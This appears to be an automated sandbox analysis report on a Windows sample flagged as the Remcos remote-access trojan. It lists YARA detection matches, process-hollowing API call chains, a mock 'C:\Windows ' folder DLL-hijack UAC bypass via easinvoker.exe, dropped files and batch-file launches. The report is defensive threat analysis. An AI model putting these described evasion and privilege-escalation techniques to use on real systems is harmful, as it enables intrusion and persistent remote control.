Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0287B30F	0_2_0287B30F
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_028520C4	0_2_028520C4
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0288506C	0_2_0288506C
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02881D2A	0_2_02881D2A
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02897D7C	0_2_02897D7C
Source: C:\Windows \System32\easinvoker.exe	Code function: 11_2_00007FF78054B982	11_2_00007FF78054B982
Source: C:\Windows \System32\easinvoker.exe	Code function: 11_2_00007FF780544554	11_2_00007FF780544554

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_0286C194 CreateProcessAsUserW,NtCreateProcess,WaitForSingleObject,CloseHandle,CloseHandle,

0_2_0286C194

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: si.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: si.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: si.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: si.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: si.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: si.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: si.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: si.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: si.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: ?????.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: si.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section loaded: advapi.dll

Source: netutils.dll.0.dr	Static PE information: Number of sections : 19 > 10
Source: netutils.dll.8.dr	Static PE information: Number of sections : 19 > 10

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96

Source: tTIYCp2sf4.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

File deleted: C:\Windows \System32\NETUTILS.dll

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows

Jump to behavior

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: String function: 02854824 appears 279 times
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: String function: 02854698 appears 51 times

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02867B80 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,VirtualProtectEx,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,	0_2_02867B80
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0286C194 CreateProcessAsUserW,NtCreateProcess,WaitForSingleObject,CloseHandle,CloseHandle,	0_2_0286C194
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_028679CC GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_028679CC
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0286BCF4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0286BCF4
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0286BC64 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0286BC64
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0286BDD8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_0286BDD8
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02869D28 CreateProcessAsUserW,NtCreateProcess,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtFlushInstructionCache,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,	0_2_02869D28
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02868328 GetModuleHandleW,GetProcAddress,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,RtlMoveMemory,RtlMoveMemory,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,CloseHandle,	0_2_02868328

Source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs tTIYCp2sf4.exe
Source: tTIYCp2sf4.exe, 00000000.00000003.540595825.0000000003971000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs tTIYCp2sf4.exe
Source: tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs tTIYCp2sf4.exe
Source: tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs tTIYCp2sf4.exe

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

File created: C:\Users\Public\Libraries\Gjwyghlf.PIF

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@36/19@8/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\GjwyghlfO.bat" "

Source: tTIYCp2sf4.exe	Virustotal: Detection: 47%
Source: tTIYCp2sf4.exe	ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

File read: C:\Users\user\Desktop\tTIYCp2sf4.exe

Jump to behavior

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\tTIYCp2sf4.exe C:\Users\user\Desktop\tTIYCp2sf4.exe
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\GjwyghlfO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
